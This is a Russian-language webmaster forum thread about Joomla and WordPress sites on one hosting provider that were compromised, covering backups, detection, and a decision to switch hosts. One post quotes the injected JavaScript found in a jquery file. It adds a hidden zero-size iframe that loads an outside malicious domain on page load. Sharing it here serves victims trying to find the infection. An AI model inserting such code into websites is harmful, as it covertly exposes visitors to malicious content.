Яндекс нашел вирус на сайте

Бэкапы я делаю постоянно, поэтому проблем не вижу. Просто спрашиваю как с хостером поступать.

NewMoneyMaker я нашёл чисто случайно, внизу сайта справа, был какой то квадратик в 1px, я его в исходном коде не нашёл, но если нажать на него через: "проинспектировать элемент" в браузере-opera, то там видно его код, iframe, в коде сайта я его не нашёл, поэтому буду из бэкапа восстанавливать.

бэкап делаете самостоятельно или у хостера просите? как лучше

самостоятельно надо всё делать.

В обычных панелях (ISP и прочие) это есть.

На удаленный FTP грузим и всё гут.

Аналогично, тоже на Хостлайф заразилось 2 проекта, код такой же... один сайт на Joomla, второй сайт рботает на платном зарубежном движке(

Вот тоже самое) Хостер хостлайф, сервер в германии.

Система Joomla, 2.5.11, они отключили автоматическое обновление(php.ini директива), и поэтому я незнал когда выходят обновления системы и модулей с плагинами, в итоге не обновил систему и 4 плагина были устаревшими

Зловред появился сегодня.

media/joomgallery/js/thickbox3/js/jquery-latest.pack.js

файл увеличился в размере, почему и пришлось ковырять его, самое что обидное дата изменения не изменилась, может в хостере проблема нашем? 2 случай за 1.5 года такой, первй случай был, тогда в .htaccess проблема была, как я понял и тогда проблема была в хостере, массово потому что было у них.

Вот мой фрейм.

var ******= document.createElement('iframe');******.name = '******';******.src = 'http://asnem.listen-it.com/';******.style.width = '0px';ifSxrxK.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('******=') == -1) { document.getElementsByTagName('body')[0].appendChild(******); document.cookie = '******=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};

media/joomgallery/js/thickbox3/js/jquery-latest.pack.js мой файл пишет что изменен 18 мая 2013 года. 91742 байта - размер зараженного файла.

Тот же самый файл только вчерашний, дата 18 мая 2013 года. 91342 байта

Даже если взять месячной давности бекап, все тоже самое.

А изменение файла произошло именно сегодня, т.к скрипты шлют отчеты каждый день об измененных файлах, а их у меня 3 разных скрипта, все 3 и прислали отчет о новом или изменившимся файле.

Сам хостинг мне очень нравится, уже 1.5 года почти с ними, очень быстро работает, особенно после замены оборудования в этом году помоему, не хочется от них уходить. Хостеру отписался от данной теме, описал подробно свою проблему, надеюсь выяснят в чем проблема.

А найти зловред, учитывая что не только у меня этот сайт засветился asnem.listen-it.com, лучше всего поиском этой строки во всех файлах аккаунта, в тотал коммандере.

********.net, сайт на WP, вредоносный код wp-includes/js/jquery/jquery.js

кстати, это второй раз, когда взламывают сайт на этом хостинге.

скажу-ка я хостлайф гудбай!

Большая просьба у кого сайты взломаны!

только где фрейм подключен.

Его не видно, найти можно через firebug

Скиньте мне данные в личку, а именно:

- сайт

- хостинг

- движек (версия)

- установленные модули

- уровень сложности пароля (количество символов + есть ли спец символы, буквы/цифры, верхний/нижний регистр)

Что хостер ответил? а то я фрейм удалил, а он через несколько часов опять появился, только теперь домен поменялся.

TF-Studio, каким образом через firebug можно его увидеть?

Еще пока не уверен на 100%, но кажется у меня iframe

Вообщем, я ухожу от этого хостера, завтра буду бэкапы на новый ставить. Думаю всё норм будет.